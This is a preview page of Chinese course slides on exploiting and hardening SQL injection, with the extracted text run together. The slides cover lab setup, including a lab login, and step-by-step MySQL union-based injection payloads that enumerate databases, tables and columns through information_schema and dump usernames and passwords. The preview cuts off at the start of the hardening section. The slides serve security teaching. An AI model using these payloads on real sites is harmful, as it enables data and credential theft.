網(wǎng)絡(luò)攻防項(xiàng)目實(shí)戰(zhàn) 課件 3.1 SQL注入漏洞利用與加固_第1頁(yè)
網(wǎng)絡(luò)攻防項(xiàng)目實(shí)戰(zhàn) 課件 3.1 SQL注入漏洞利用與加固_第2頁(yè)
網(wǎng)絡(luò)攻防項(xiàng)目實(shí)戰(zhàn) 課件 3.1 SQL注入漏洞利用與加固_第3頁(yè)
網(wǎng)絡(luò)攻防項(xiàng)目實(shí)戰(zhàn) 課件 3.1 SQL注入漏洞利用與加固_第4頁(yè)
網(wǎng)絡(luò)攻防項(xiàng)目實(shí)戰(zhàn) 課件 3.1 SQL注入漏洞利用與加固_第5頁(yè)
已閱讀5頁(yè),還剩15頁(yè)未讀, 繼續(xù)免費(fèi)閱讀

下載本文檔

版權(quán)說(shuō)明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請(qǐng)進(jìn)行舉報(bào)或認(rèn)領(lǐng)

文檔簡(jiǎn)介

WEB滲透與加固3.1SQL注入漏洞利用與加固020301環(huán)境部署手工注入漏洞漏洞加固目錄環(huán)境部署01環(huán)境部署1.打開(kāi)VMwareWorkstation虛擬機(jī)軟件,選擇菜單欄中的“編輯”選項(xiàng),在“VMnet信息”選區(qū)中勾選“NAT模式”,將DHCP服務(wù)設(shè)置子網(wǎng)Ip與子網(wǎng)掩碼環(huán)境部署2.單擊“NAT設(shè)置”按鈕,在彈出的對(duì)話框中設(shè)置網(wǎng)關(guān)IP環(huán)境部署3.單擊“DHCP設(shè)置”按鈕,將設(shè)置起始IP地址與結(jié)束IP地址環(huán)境部署4.開(kāi)啟虛擬機(jī)后,單擊“開(kāi)始”按鈕,在搜索框中輸入“cmd”打開(kāi)cmd終端命令行窗口,輸入“ipconfig”命令查看本機(jī)網(wǎng)絡(luò)信息登錄賬號(hào):Administrator登錄密碼:A123456S.環(huán)境部署5.打開(kāi)PhPStudy之后,開(kāi)啟軟件自帶的Apache服務(wù)器與MySQL數(shù)據(jù)庫(kù)手工注入漏洞02SQL注入介紹就是通過(guò)把SQL命令插入到Web表單提交或輸入域名或頁(yè)面請(qǐng)求的查詢字符串,最終達(dá)到欺騙服務(wù)器執(zhí)行惡意的SQL命令。形成SQL注入漏洞的原因:1.用戶輸入不可控2.輸入內(nèi)容被帶入SQL語(yǔ)句執(zhí)行通過(guò)SQL注入可以對(duì)程序?qū)?yīng)的數(shù)據(jù)存儲(chǔ)區(qū)進(jìn)行對(duì)應(yīng)的探測(cè)。元數(shù)據(jù)庫(kù)MySQL5.0以后版本中存在著一個(gè)元數(shù)據(jù)庫(kù)information_schema,數(shù)據(jù)庫(kù)中存儲(chǔ)著用戶在MySQL中創(chuàng)建的所有數(shù)據(jù)庫(kù)的信息。在對(duì)PHP+MySQL的網(wǎng)站進(jìn)行注入時(shí),主要就是對(duì)information_schema數(shù)據(jù)庫(kù)進(jìn)行注入。4.24.03.63.5information_schema元數(shù)據(jù)庫(kù)information_schema中比較重要的數(shù)據(jù)表 schemata:用于存放所有數(shù)據(jù)庫(kù)的名字。 tables:用于存放所有數(shù)據(jù)庫(kù)中的數(shù)據(jù)表的名字。(該表包含兩個(gè)字段table_name和table_schema,分別記錄DBMS中的存儲(chǔ)的表名和表名所在的數(shù)據(jù)庫(kù)。) columns:用于存放所有數(shù)據(jù)庫(kù)的所有數(shù)據(jù)表中的所有字段的名字利用information_schema查看其他數(shù)據(jù)庫(kù)的內(nèi)容查看數(shù)據(jù)庫(kù)中包含了哪些表selecttable_namefrominformation_schema.tables查看數(shù)據(jù)表中包含了哪些字段selectcolumn_namefrominformation_schema.columns判斷注入點(diǎn)判斷是否存在注入,注入是字符型還是數(shù)字型當(dāng)輸入的參數(shù)為字符串時(shí),稱(chēng)為字符型。字符型和數(shù)字型最大的一個(gè)區(qū)別在于,數(shù)字型不需要單引號(hào)來(lái)閉合,而字符串一般需要通過(guò)單引號(hào)來(lái)閉合的。判斷注入點(diǎn):

and1=1 and1=2 and‘1’=‘1(判斷完存在注入可以用or構(gòu)造永遠(yuǎn)為真的條件進(jìn)行查詢,列出當(dāng)前表里所有信息)判斷字段數(shù)量:

orderby?判斷可顯字段一條sql語(yǔ)句無(wú)法讀取兩個(gè)select,需利用union聯(lián)合查詢語(yǔ)句判斷可顯字段unionselect1,2,3,4,5MySQL中在執(zhí)行聯(lián)合查詢時(shí),后面的查詢語(yǔ)句不需要指定表名,這點(diǎn)區(qū)別于ACCESS32/info_show.php?info_id=142unionselect1,2,3,4,5爆出敏感信息爆出當(dāng)前用戶名和數(shù)據(jù)庫(kù)名

unionselect1,user(),database(),4,5爆出數(shù)據(jù)庫(kù)中包含的數(shù)據(jù)表,通過(guò)group_concat()函數(shù)可以顯示字段中的所有內(nèi)容。unionselect1,group_concat(table_name),3,4,5frominformation_schema.tableswheretable_schema=‘*’(“*”代表之前用“database()”爆出的當(dāng)前數(shù)據(jù)庫(kù)名)

爆出敏感信息爆字段名,只有知道字段名,才能查詢數(shù)據(jù)庫(kù)中存儲(chǔ)的數(shù)據(jù)。unionselect1,group_concat(column_name),3,4,5frominformation_schema.columnswheretable_name=‘*’(“*”代表之前之前爆出的當(dāng)前數(shù)據(jù)庫(kù)中存在的表名)爆用戶名和密碼unionselect1,username,password,4,5from*(“*”代表之前之前爆出的當(dāng)前數(shù)據(jù)庫(kù)中存在的表名)成功爆出用戶名、密碼后,密碼采用md5進(jìn)行加密,可以到/查詢解密也可以利用unhex(hex())函數(shù)進(jìn)行編碼轉(zhuǎn)換,解決網(wǎng)站編碼不一致導(dǎo)致的問(wèn)題。漏洞加固03查找參數(shù)1.對(duì)于有些網(wǎng)站來(lái)說(shuō);URL中id參數(shù)的主要功能是進(jìn)

溫馨提示

  • 1. 本站所有資源如無(wú)特殊說(shuō)明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請(qǐng)下載最新的WinRAR軟件解壓。
  • 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請(qǐng)聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
  • 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁(yè)內(nèi)容里面會(huì)有圖紙預(yù)覽,若沒(méi)有圖紙預(yù)覽就沒(méi)有圖紙。
  • 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
  • 5. 人人文庫(kù)網(wǎng)僅提供信息存儲(chǔ)空間,僅對(duì)用戶上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對(duì)用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對(duì)任何下載內(nèi)容負(fù)責(zé)。
  • 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請(qǐng)與我們聯(lián)系,我們立即糾正。
  • 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時(shí)也不承擔(dān)用戶因使用這些下載資源對(duì)自己和他人造成任何形式的傷害或損失。

評(píng)論

0/150

提交評(píng)論